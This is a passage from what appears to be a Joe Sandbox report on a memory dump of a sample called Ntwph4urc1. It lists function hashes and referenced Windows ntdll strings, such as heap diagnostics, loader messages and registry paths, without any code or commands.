                                            • Instruction ID: 5df834b7d037f7cd41f1de04ea03d2d32dbb24421a4655b51f43ada4a1dfcbd7
                                            • Opcode Fuzzy Hash: dbc6fb9ded5d6d211fa0a69a286d71edc0a861a48e387c1e06b85c6af1f8dfdf
                                            • Instruction Fuzzy Hash: 93F11876E406118FDB08CF69C9A067DFBF6EF88204B19416DD856DF381E634EA41CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                            • API String ID: 0-3061284088
                                            • Opcode ID: 1a1f8799feb96b6e6291b35be635e7ffa9b5396ca3ded1a00a9e46315f5f402b
                                            • Instruction ID: 841947827a1d9079dfbadd78de1a2d5b8926175f8e9dba5cffab5b58f62b5423
                                            • Opcode Fuzzy Hash: 1a1f8799feb96b6e6291b35be635e7ffa9b5396ca3ded1a00a9e46315f5f402b
                                            • Instruction Fuzzy Hash: 96014C37014394EFE326D368EC09F577BF8DB82774F244049E1005B69DCAA9DC81C561
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 904e2debad576450b5bef608deb65087b56e61d43d62979692e5d3f8194c281b
                                            • Instruction ID: afcb77a5a2572baeea12e02f65ea1b4a6cc522371da9db9889c37e547e524b17
                                            • Opcode Fuzzy Hash: 904e2debad576450b5bef608deb65087b56e61d43d62979692e5d3f8194c281b
                                            • Instruction Fuzzy Hash: F513AE74E00355CFEB15CF6AC9947A9BBF5FF48318F2481A9D845AB381D734A846CBA0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$.mui$.mun$SystemResources\
                                            • API String ID: 0-3047833772
                                            • Opcode ID: 1e4b37aba12b10c48d997f89cc4002fb6151c84c62e859bebe5bea05eb8cb48a
                                            • Instruction ID: 44a9faeb4afae72cb188547f31a8a08903abdc8c5df6f04db1660f4e00f25c35
                                            • Opcode Fuzzy Hash: 1e4b37aba12b10c48d997f89cc4002fb6151c84c62e859bebe5bea05eb8cb48a
                                            • Instruction Fuzzy Hash: 23622672A00329DFDF20CF55CC40BE9B7B8BB0A254F5141EAE509A7A50DB719E85CF92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                            • API String ID: 0-2586055223
                                            • Opcode ID: a1f7f64f502d879ef12e81b0c83f205e0b098a9d2d78878493fb411bb4ae860d
                                            • Instruction ID: 677b448b9ff14857d70c295272b50a4b4410d056217cfcac2ea7e905bfb1fc91
                                            • Opcode Fuzzy Hash: a1f7f64f502d879ef12e81b0c83f205e0b098a9d2d78878493fb411bb4ae860d
                                            • Instruction Fuzzy Hash: EA613472A04785AFE312DB25DD54F6777ECEF80758F240469FA948B292DB34D800DB62
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                            • API String ID: 0-336120773
                                            • Opcode ID: ad512ccd168d84bbd30b574f1ad482070dd8edf90e99c8437f83ed61e278e81c
                                            • Instruction ID: c68c41394dd0e3a6347ffada408dc00bf652de284b4066f6ab9894e5b51439b1
                                            • Opcode Fuzzy Hash: ad512ccd168d84bbd30b574f1ad482070dd8edf90e99c8437f83ed61e278e81c
                                            • Instruction Fuzzy Hash: 6631DE76510214EFE701DBE9DC80F967BE8EF4A768F5000A5E901DB291EA35EC41CEA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                            • API String ID: 0-1391187441
                                            • Opcode ID: 36276f10aad27a50eac4f049ab520e9260321dbf1882b09a626f46b40dce7ad9
                                            • Instruction ID: 929280d35bc3f6f75bc334c82241a80e728218b69efa43d44f0febc7990ccbad
                                            • Opcode Fuzzy Hash: 36276f10aad27a50eac4f049ab520e9260321dbf1882b09a626f46b40dce7ad9
                                            • Instruction Fuzzy Hash: 4A31CF76A10218EFD702DB95CC88F9AB7FDEF49774F204091E914AB295DB34ED40CA61
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: a8868bf1591fa86d0d6b45dbe41565c2ea42b22ed2c91a4a14be5b9cb6fbb6d5
                                            • Instruction ID: fe678c462bdc275542698e82460f903587b1b3404a3783f2cb0bc61274dfe51e
                                            • Opcode Fuzzy Hash: a8868bf1591fa86d0d6b45dbe41565c2ea42b22ed2c91a4a14be5b9cb6fbb6d5
                                            • Instruction Fuzzy Hash: 89510F34E10715EFFB05CB64CD98BADBBB9BF04354F214069E6029B290DBB09A02CBD1
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 5ba7b41c21894114f9c51c30ae6b991cb983315b0c007c62864f4d9afc45d536
                                            • Instruction ID: 61816e117dd18382d898e25a1e0ad4cb4da415896ce2b98dba32dbe9e975107b
                                            • Opcode Fuzzy Hash: 5ba7b41c21894114f9c51c30ae6b991cb983315b0c007c62864f4d9afc45d536
                                            • Instruction Fuzzy Hash: B43113B5E1421A8BDB41CF99D848ADDFBB5BF48351F25806AE811BB310CB769C42DF60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 4dd227a8af12d6a2517d6c2276a2ae0c87205ba713112dd56585fa073909650a
                                            • Instruction ID: 7794c45e0d1a29c96afe0cd637e7a2dc2d37c03b8a2eac9e0233db8f0f879877
                                            • Opcode Fuzzy Hash: 4dd227a8af12d6a2517d6c2276a2ae0c87205ba713112dd56585fa073909650a
                                            • Instruction Fuzzy Hash: 20220474A00346EFEB11CF26C890B7ABBF9FF45718F248499E4458B286D735E882CB51
                                            Strings
                                            • HEAP: , xrefs: 36951596
                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36951728
                                            • HEAP[%wZ]: , xrefs: 36951712
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 11cd2265d9fd1f96d8eda8ae3217cdb2f5b07144d1bc20f59df78f473fb0cf9c
                                            • Instruction ID: 9d77bc1b0b524a5e08b49ff6329a29dc37922ed3b9b8faf8833a64005ef4e889
                                            • Opcode Fuzzy Hash: 11cd2265d9fd1f96d8eda8ae3217cdb2f5b07144d1bc20f59df78f473fb0cf9c
                                            • Instruction Fuzzy Hash: A2E1FF74A043559FEB15CF28C890B7ABBF5EF48308F25845DEA96CB246DB34E941CB90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                            • API String ID: 0-1145731471
                                            • Opcode ID: 488fc1b75348e3ee42ecb5288838fe389ab132c50247cd39a2cde7f7b03f2642
                                            • Instruction ID: ce5494d72da42e79ecc4bec7f3a411ef61236d51a35809a7842a816dc7e641d6
                                            • Opcode Fuzzy Hash: 488fc1b75348e3ee42ecb5288838fe389ab132c50247cd39a2cde7f7b03f2642
                                            • Instruction Fuzzy Hash: 6CB10F75E147199FEB25CF6AC8A0B9DB3B6BF48394F254429E911EB384D770E840CB42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                            • API String ID: 0-2391371766
                                            • Opcode ID: 771268e746b63c00978f2f07b840dca583bb2d2c6f9a39a964303484c334355c
                                            • Instruction ID: ea267bffb3ce8417346bff0b1dfce0c549eb07f46712184748d1d8de3391e552
                                            • Opcode Fuzzy Hash: 771268e746b63c00978f2f07b840dca583bb2d2c6f9a39a964303484c334355c
                                            • Instruction Fuzzy Hash: 82B1BFB1A04345AFE711CF55CC80B5BB7E8EB4A765F508839FA40AB241D775EC05CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                            • API String ID: 0-318774311
                                            • Opcode ID: 9bb81d334c9be52702547366c9e60676b5ba62065c3706feac4a4e9469480079
                                            • Instruction ID: 8b98d4a7317cf3539091b55df0465a5429a580db93c1db36865709a09b583896
                                            • Opcode Fuzzy Hash: 9bb81d334c9be52702547366c9e60676b5ba62065c3706feac4a4e9469480079
                                            • Instruction Fuzzy Hash: 71818DB5608350EFE312CB16C840B6AB7E8FF89794F501929F990DB391DB75D904CB92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                            • API String ID: 0-3870751728
                                            • Opcode ID: 160fa3945953317d88a07559e37b8f651dff77b29c23351a272aaf59d1acda0a
                                            • Instruction ID: a59826fb684513a67b1c768d31d56c777db2d74726d4e3a4f0267b832260d2b9
                                            • Opcode Fuzzy Hash: 160fa3945953317d88a07559e37b8f651dff77b29c23351a272aaf59d1acda0a
                                            • Instruction Fuzzy Hash: 8B914BB4E002159FEB14CFA9C884B9DBBF1FF48314F24C16AE905AB291E7759842CF91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                            • API String ID: 0-373624363
                                            • Opcode ID: 48bad8aeee8718c403aea0178611e5cb5811cfac2b8b70825b4190a212e12cf1
                                            • Instruction ID: c504e20ef5c89005dda2225c1d94970fe0219724fd48621b3fa55169cdddd4b2
                                            • Opcode Fuzzy Hash: 48bad8aeee8718c403aea0178611e5cb5811cfac2b8b70825b4190a212e12cf1
                                            • Instruction Fuzzy Hash: 2991DFB5E01319CFEF21CF55D8A0BAE77B4EF05364F224195E900AB294D7B89E81CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$&$@
                                            • API String ID: 0-1537733988
                                            • Opcode ID: a8ee8191d2a8e5998ca04a4b54eb67d9f42b6714b929a78bc2a471dacea56ce4
                                            • Instruction ID: ece15c6d28648a2c6d3374b92b479f0ba1c7192e1ee13b04e97d7de4d20a1ed8
                                            • Opcode Fuzzy Hash: a8ee8191d2a8e5998ca04a4b54eb67d9f42b6714b929a78bc2a471dacea56ce4
                                            • Instruction Fuzzy Hash: 9C71AE74A0C3019FE710CF29C980A5BBBEDBF85758F208A1DE49987691D735D906CB93
                                            Strings
                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 36A2B82A
                                            • TargetNtPath, xrefs: 36A2B82F
                                            • GlobalizationUserSettings, xrefs: 36A2B834
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                            • API String ID: 0-505981995
                                            • Opcode ID: 3cc591df1348f295631b8ef6c8d88430f06328cd01ca48a09d0add03fee967a1
                                            • Instruction ID: a32002891d8c8af8dd52e98750a020a61c42b5e2164e3568bdf57a99b0c02b83
                                            • Opcode Fuzzy Hash: 3cc591df1348f295631b8ef6c8d88430f06328cd01ca48a09d0add03fee967a1
                                            • Instruction Fuzzy Hash: B5617D72D41229AFDB21DB55DC88B9AB7F9AF14728F4101E5E908AB250DB34DE84CF90
                                            Strings
                                            • HEAP: , xrefs: 369AE6B3
                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 369AE6C6
                                            • HEAP[%wZ]: , xrefs: 369AE6A6
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                            • API String ID: 0-1340214556
                                            • Opcode ID: 88dce1fa79584782bd4048fe42561e8e37c580a15b9b86d2d231172a158037b3
                                            • Instruction ID: 87dd36d804e55ab0685ae8365358055b7262815a2ef92632bf6181805234aa96
                                            • Opcode Fuzzy Hash: 88dce1fa79584782bd4048fe42561e8e37c580a15b9b86d2d231172a158037b3
                                            • Instruction Fuzzy Hash: 9F51F375A00B45EFE312DBA9C994FAABBF8EF45344F1000A5EA418B792D734ED40DB51
                                            Strings
                                            • minkernel\ntdll\ldrmap.c, xrefs: 369BA59A
                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 369BA589
                                            • LdrpCompleteMapModule, xrefs: 369BA590
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                            • API String ID: 0-1676968949
                                            • Opcode ID: ac20f38243552dfbe644c1f55239072aa88b87e18a79a7df906d6ad9ac29bbd7
                                            • Instruction ID: bca472700a94164d6125b51af02e5d37a93274f88031d48045f36896810929c7
                                            • Opcode Fuzzy Hash: ac20f38243552dfbe644c1f55239072aa88b87e18a79a7df906d6ad9ac29bbd7
                                            • Instruction Fuzzy Hash: 7D5104B4A00745DBFB21CB19CD44B0A7FE8EF00758F280165E9509B6E2DBB4EE41C795
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                            • API String ID: 0-1151232445
                                            • Opcode ID: e9bcb62cac35c26ea106f5a3f65f7c4716f92cfc201e78048d0f932bd0c0a787
                                            • Instruction ID: 32b4de69a581743c9b9718ecbbb9b42155a52f6304fcb8661d4be8bf3ae17d92
                                            • Opcode Fuzzy Hash: e9bcb62cac35c26ea106f5a3f65f7c4716f92cfc201e78048d0f932bd0c0a787
                                            • Instruction Fuzzy Hash: D3417AB4B003C48FFB2ADE1DC98876977EA9F05398F74406DD4458F246DAB4D886CB52
                                            Strings
                                            • LdrpAllocateTls, xrefs: 369C1B40
                                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 369C1B39
                                            • minkernel\ntdll\ldrtls.c, xrefs: 369C1B4A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                            • API String ID: 0-4274184382
                                            • Opcode ID: 69ba994ea25fd93eac5d67d954214e0fc6e14614898708476ba0b354f1ad4edf
                                            • Instruction ID: f2dc7d386fa52ba634afcb98b8966fb0423d018363cb6e70dbfb6ddb5b83b832
                                            • Opcode Fuzzy Hash: 69ba994ea25fd93eac5d67d954214e0fc6e14614898708476ba0b354f1ad4edf
                                            • Instruction Fuzzy Hash: B04176B5E00609EFDB15CFA9CC40AAEBBF6FF88314F508129E506A7351DB35A901CB91
                                            Strings
                                            • SXS: %s() passed the empty activation context data, xrefs: 369C29FE
                                            • RtlCreateActivationContext, xrefs: 369C29F9
                                            • Actx , xrefs: 369833AC
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                            • API String ID: 0-859632880
                                            • Opcode ID: ddb804ddba3468d34acbd0a5b4f69f6fbde6d4d3c0fca667e414908b6aff21f6
                                            • Instruction ID: 4646eee26f5296e53f3331c533e323118e7b598a2b46c9d903df15767e1cc596
                                            • Opcode Fuzzy Hash: ddb804ddba3468d34acbd0a5b4f69f6fbde6d4d3c0fca667e414908b6aff21f6
                                            • Instruction Fuzzy Hash: 9A3148326003159FEB16CFAADC80F9637A8EB88724F614469ED089F292CB35DC51C791
                                            Strings
                                            • @, xrefs: 369DB670
                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 369DB632
                                            • GlobalFlag, xrefs: 369DB68F
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                             • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                            • API String ID: 0-4192008846
                                            • Opcode ID: fbffb8fc5123e59f7bb7f9eb2427d6dfc13e6cda170c919bf3cc065e9317d1b4
                                            • Instruction ID: 7f4ba28501c2d071fbbd2a1b1aaa1024ddc4c388178030a345029f0011fa9a88
                                            • Opcode Fuzzy Hash: fbffb8fc5123e59f7bb7f9eb2427d6dfc13e6cda170c919bf3cc065e9317d1b4
